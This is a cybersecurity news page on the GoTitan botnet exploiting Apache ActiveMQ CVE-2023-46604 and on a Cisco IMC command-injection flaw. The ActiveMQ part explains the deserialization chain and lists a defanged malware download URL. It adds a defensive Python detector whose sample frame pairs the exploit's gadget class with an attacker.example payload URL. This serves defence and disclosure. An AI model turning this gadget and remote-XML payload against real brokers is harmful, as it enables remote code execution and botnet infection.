Instagram’s Threads reaches over 100 million users in five days. Mergers and acquisitions. Investments and exits. Executive moves. Company news. Labor markets. Read More
The CyberWire
GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability
Attackers are exploiting a recently disclosed critical vulnerability in Apache ActiveMQ, tracked as CVE-2023-46604, to distribute the Go-based botnet GoTitan and a remotely controllable .NET application named “PrCtrl Rat.”
Apache ActiveMQ releases earlier than 5.15.16, 5.16.7, 5.17.6 and 5.18.3 are affected regardless of the host operating system; those four releases carry the fix.
Apache published an advisory for CVE-2023-46604 in October 2023. The flaw is a deserialization of untrusted data in ActiveMQ’s handling of its OpenWire protocol.
Citing the high risk and potential impact, CISA added CVE-2023-46604 to its Known Exploited Vulnerabilities (KEV) catalog on November 2, 2023.
In this case the attacker sends a crafted OpenWire packet that makes the broker unmarshal a class of the attacker’s choosing.
The class chosen takes a URL as its constructor argument and loads a bean-configuration XML file from it, so the vulnerable server fetches an attacker-hosted XML file over HTTP and applies it.
That XML defines the code to run on the compromised host: it declares a bean whose constructor arguments begin with a shell such as “cmd” or “bash” and end with the command to execute, which gives the attacker remote code execution on the broker.
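As an added example (it is not code from the article, from Fortinet or from Apache), the following Python sketches the two checks a defender wants at this point: classify an ActiveMQ version string against the fixed releases listed above, and scan an OpenWire frame for the shape of the attack just described, an attacker-chosen class name sitting next to a remote URL. The sample frames are constructed and simplified from the OpenWire layout (Java-style strings with a 2-byte big-endian length prefix, string values in the property map tagged 0x09); the gadget class org.springframework.context.support.ClassPathXmlApplicationContext is the one publicly reported for this CVE and is an assumption of the example; attacker.example is a placeholder host.

```python
"""Passive CVE-2023-46604 checks for OpenWire traffic. Added example, not ActiveMQ code."""
import re
from typing import Dict, List, Optional, Tuple

# First fixed release per branch, from the Apache advisory. Older branches have no fix.
FIXED_RELEASES: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}

# Spring class publicly reported as the gadget that loads the remote XML (assumption).
GADGET_CLASS = "org.springframework.context.support.ClassPathXmlApplicationContext"


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '5.18.2' or '5.18.2-SNAPSHOT' into (5, 18, 2)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def is_vulnerable(version: str) -> bool:
    """True when the release predates the fix for its branch."""
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch > (5, 18):   # 6.0 and later shipped after the fix
        return False
    if branch < (5, 15):   # end-of-life branches never received a fix
        return True
    return (major, minor, patch) < FIXED_RELEASES[branch]


def utf_strings(frame: bytes, min_len: int = 4, max_len: int = 512) -> List[str]:
    """Heuristically pull out length-prefixed printable ASCII strings from a frame.

    A match needs a plausible 2-byte length followed by exactly that many printable
    bytes; on a miss the scan advances one byte, so binary fields are skipped.
    """
    found: List[str] = []
    i = 0
    while i + 2 <= len(frame):
        n = int.from_bytes(frame[i:i + 2], "big")
        body = frame[i + 2:i + 2 + n]
        if min_len <= n <= max_len and len(body) == n and all(0x20 <= b < 0x7F for b in body):
            found.append(body.decode("ascii"))
            i += 2 + n
        else:
            i += 1
    return found


def provider_version(banner: bytes) -> Optional[str]:
    """Return the ProviderVersion a broker advertises in its WireFormatInfo, if present."""
    strings = utf_strings(banner)
    for key, value in zip(strings, strings[1:]):
        if key == "ProviderVersion":
            return value
    return None


def exploit_indicators(frame: bytes) -> Optional[Dict[str, str]]:
    """Flag a frame carrying the gadget class name together with a remote URL."""
    strings = utf_strings(frame)
    gadget = next((s for s in strings if s == GADGET_CLASS), None)
    url = next((s for s in strings if s.startswith(("http://", "https://"))), None)
    if gadget and url:
        return {"class": gadget, "url": url}
    return None


def _utf(s: bytes) -> bytes:
    """Java-style string: 2-byte big-endian length, then the bytes."""
    return len(s).to_bytes(2, "big") + s


# Constructed sample frames, simplified from the OpenWire layout (not captured traffic).
BANNER = (
    b"\x00\x00\x00\x00"          # frame length (placeholder)
    b"\x01"                      # command type 1 = WIREFORMAT_INFO
    b"ActiveMQ"                  # magic
    b"\x00\x00\x00\x0c"          # OpenWire version 12
    b"\x01\x00\x00\x00\x02"      # properties present, two entries (simplified)
    + _utf(b"ProviderName") + b"\x09" + _utf(b"ActiveMQ")     # 0x09 = STRING_TYPE
    + _utf(b"ProviderVersion") + b"\x09" + _utf(b"5.18.2")
)

PROBE = (
    b"\x00\x00\x00\x00"          # frame length (placeholder)
    b"\x1f"                      # command type 31 = EXCEPTION_RESPONSE
    b"\x01\x00\x01"              # header fields (simplified filler)
    + b"\x01" + _utf(GADGET_CLASS.encode())                  # attacker-chosen class name
    + b"\x01" + _utf(b"http://attacker.example/payload.xml")  # constructor argument: remote XML
)


if __name__ == "__main__":
    ver = provider_version(BANNER)
    state = "VULNERABLE" if ver and is_vulnerable(ver) else "fixed"
    print(f"broker reports {ver}: {state}")
    print("probe indicators:", exploit_indicators(PROBE))
```

Both checks are passive: `provider_version` works on the banner a broker sends on any connection to the OpenWire port (61616/tcp by default), and `exploit_indicators` only needs a copy of inbound traffic, so they suit a quick inventory sweep or a detection rule rather than a replacement for patching.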
According to Fortinet researchers, who identified GoTitan this month, the botnet is written in Go and was retrieved from the malicious URL “hxxp://91.92.242.14/main-linux-amd64s”. The attacker serves binaries only for x86-64, and the malware runs several checks before it proceeds to execution.
It also creates a file named “c.log” that records program status and execution time. This looks like a developer’s debug log, which suggests GoTitan is still at an early stage of development.
GoTitan then obtains its C2 IP address and collects key facts about the compromised endpoint, such as CPU details, memory and architecture, for reporting to the C2 server.
“GoTitan communicates with its C2 server by sending ‘\xFE\xFE’ as a heartbeat signal and waiting for further instructions. When it receives a command, it passes it to a function named ‘handle_socket_func2’ that determines an attack method,” researchers explain.
Fortinet counts 10 distinct distributed denial-of-service (DDoS) methods in GoTitan, among them TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD and HTTP PUT floods.
On the same compromised hosts the researchers also found better-known malware and tools, including Sliver, Kinsing and Ddostf.
Upgrading to a fixed ActiveMQ release, keeping the OpenWire port (61616/tcp by default) off untrusted networks, and monitoring security advisories remain the practical ways to reduce the risk of exploitation.
The post GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability appeared first on Cyber Security News.
Cyber Security News
StripedFly reclassified from petty larceny to APT.
Not all unwanted programs are what they appear to be. (You knew that, but in this case a major threat poses as a minor nuisance.) Read More
The CyberWire
Cisco IMC Command Injection Vulnerability Under Active Attack
An attacker with read-only or higher privileges on a Cisco Integrated Management Controller (IMC) can exploit a command injection vulnerability (CVE-2024-20295) to gain full control (root access) of the underlying operating system.
The flaw stems from insufficient validation of user-supplied input in the IMC CLI. There are no workarounds, but Cisco has released software updates that fix it.
Affected products are those that run Cisco IMC in standalone mode: the 5000 Series Enterprise Network Compute System (ENCS), the Catalyst 8300 Series Edge uCPE, UCS C-Series and E-Series servers, and the Cisco appliances built on preconfigured UCS C-Series servers, such as wireless controllers, APIC servers, Business Edition appliances and Catalyst Center appliances.
UCS B-Series Blade Servers, UCS C-Series Rack Servers managed by Cisco UCS Manager, UCS S-Series Storage Servers and UCS X-Series Modular Systems do not run Cisco IMC in this way, which keeps them out of the attack surface; Cisco has confirmed these products are not affected.
Cisco has released software updates for the vulnerability; they are free to customers whose service contract includes software updates.
Customers running an affected product should upgrade as soon as possible. Cisco supports only software versions the customer holds a license for: security fixes are delivered as maintenance updates to existing software and do not grant new licenses or major-version upgrades, so the license must come from Cisco or an authorized partner.
Before upgrading, check the Cisco Security Advisories for known issues and solutions, and make sure the device has enough memory and supports the new release.
Customers without a Cisco service contract, or who cannot obtain the fix through their vendor, can contact Cisco TAC for a free upgrade.
The advisory also includes a table listing affected software versions and the corresponding fixed releases.
For the 5000 Series ENCS and Catalyst 8300 Series Edge uCPE, Cisco IMC is not upgraded on its own: upgrade the Cisco NFVIS software, and the IMC firmware is updated automatically as part of that process.
For UCS C-Series and E-Series servers, the fixed Cisco IMC releases are listed by server generation (C-Series M4, M5, M6 and M7; E-Series M2, M3 and M6).
Upgrade Cisco IMC to the fixed release for the server model in question; some Cisco appliances instead require a specific firmware update package or hotfix.
The post Cisco IMC Command Injection Vulnerability Under Active Attack appeared first on Cyber Security News.
Cyber Security News